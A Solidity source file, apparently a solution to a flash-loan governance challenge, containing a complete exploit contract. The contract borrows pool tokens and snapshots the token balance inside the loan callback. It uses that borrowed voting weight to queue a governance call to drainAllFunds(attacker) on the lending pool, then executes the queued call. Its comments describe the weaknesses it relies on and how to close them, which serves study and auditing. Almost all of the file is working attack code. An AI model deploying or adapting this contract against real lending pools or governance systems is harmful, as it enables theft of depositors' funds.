SelfieExploit.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
/// @notice Minimal view of the lending pool that this file borrows from.
/// @dev Only the one entry point called below is declared; the pool's
///      implementation is not part of this file.
interface ISelfiePool {
    /// @notice Request a flash loan of `borrowAmount` tokens.
    /// @dev NOTE(review): presumably the pool calls back
    ///      `receiveTokens(address,uint256)` on the borrower and expects
    ///      repayment within the same transaction; confirm against the
    ///      pool's source.
    /// @param borrowAmount Amount of tokens to borrow.
    function flashLoan(uint256 borrowAmount) external;
}
/// @notice Minimal view of the governance contract used by this file.
/// @dev Only the two calls made below are declared. The rules the governance
///      applies (who may queue, any delay before execution) are not visible
///      from this interface.
interface ISimpleGovernance {
    /// @notice Queue a call for later execution.
    /// @param receiver Contract the queued call targets.
    /// @param data ABI-encoded calldata for the queued call.
    /// @param weiAmount Ether value to send with the queued call.
    /// @return Identifier of the queued action, later passed to `executeAction`.
    function queueAction(address receiver, bytes calldata data, uint256 weiAmount)
        external
        returns (uint256);

    /// @notice Execute a previously queued action.
    /// @param actionId Identifier returned by `queueAction`.
    function executeAction(uint256 actionId) external payable;
}
/// @notice Minimal view of the snapshot-capable token handled in `receiveTokens`.
/// @dev Only the two calls made below are declared; the token's access
///      control on `snapshot()` is not visible from this interface.
interface ITokenSnapshot {
    /// @notice Record a new balance snapshot.
    /// @return Identifier of the snapshot that was taken.
    function snapshot() external returns (uint256);

    /// @notice Transfer `amount` tokens from the caller to `recipient`.
    /// @param recipient Address that receives the tokens.
    /// @param amount Number of tokens to move.
    /// @return Success flag reported by the token.
    function transfer(address recipient, uint256 amount) external returns (bool);
}
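/// @title SelfieExploit
/// @notice Proof-of-concept for the weakness exercised in this file: a token
///         balance obtained through a flash loan is snapshotted and, in the
///         same call, used to queue a governance action against the lending
///         pool.
/// @dev Flow as written below:
///      1. `attack` asks the pool for a flash loan.
///      2. `receiveTokens` (the loan callback) takes a token snapshot, queues
///         `drainAllFunds(attacker)` on the pool through governance, and
///         repays the loan.
///      3. `execute` asks governance to run the queued action.
///
///      Review notes for the contracts under test (their code is not shown
///      here, so each point should be confirmed against their source):
///      - The PoC relies on `snapshot()` being callable by an arbitrary
///        account. Restricting who may trigger snapshots closes that step.
///      - The PoC relies on governance accepting voting weight that was
///        acquired and snapshotted inside a single transaction. Measuring
///        weight at a point before the proposal transaction, or over a
///        holding period, removes the flash-loan shortcut.
///      - `attack` and `execute` carry no caller check in this contract.
contract SelfieExploit {
    /// @notice Lending pool that grants the flash loan and is the target of the queued action.
    ISelfiePool public immutable pool;
    /// @dev Address encoded as the argument of the queued `drainAllFunds(address)` call.
    address attacker;
    /// @notice Governance contract through which the action is queued and executed.
    ISimpleGovernance public immutable gov;
    /// @dev Identifier returned by `queueAction`; zero until `receiveTokens` has run.
    uint256 actionId;

    /// @param _pool Address of the lending pool.
    /// @param _attacker Address passed to the queued `drainAllFunds(address)` call.
    /// @param _gov Address of the governance contract.
    constructor(
        address _pool,
        address _attacker,
        address _gov
    ) {
        pool = ISelfiePool(_pool);
        attacker = _attacker;
        gov = ISimpleGovernance(_gov);
    }

    /// @notice Start the sequence by requesting a flash loan from the pool.
    /// @param borrowAmount Amount of tokens to borrow.
    function attack(uint256 borrowAmount) external {
        pool.flashLoan(borrowAmount);
    }

    /// @notice Flash-loan callback: snapshot, queue the governance action, repay.
    /// @dev Reverts unless called by the pool, so an unrelated caller cannot
    ///      make this contract call `snapshot()`/`transfer()` on an arbitrary
    ///      `token` address or overwrite `actionId`. This assumes the pool
    ///      invokes the callback directly; confirm against the pool's source.
    /// @param token Address of the borrowed token, as supplied by the caller.
    /// @param borrowAmount Amount that was lent and must be returned to the pool.
    function receiveTokens(address token, uint256 borrowAmount) public {
        require(msg.sender == address(pool), "SelfieExploit: caller is not the pool");

        ITokenSnapshot(token).snapshot();
        actionId = gov.queueAction(
            address(pool),
            abi.encodeWithSignature("drainAllFunds(address)", attacker),
            0
        );

        // The token reports success through its return value; do not ignore it.
        bool repaid = ITokenSnapshot(token).transfer(address(pool), borrowAmount);
        require(repaid, "SelfieExploit: repayment failed");
    }

    /// @notice Ask governance to execute the action queued in `receiveTokens`.
    /// @dev NOTE(review): whether governance enforces a delay between queueing
    ///      and execution is not visible from this file.
    function execute() external {
        gov.executeAction(actionId);
    }
}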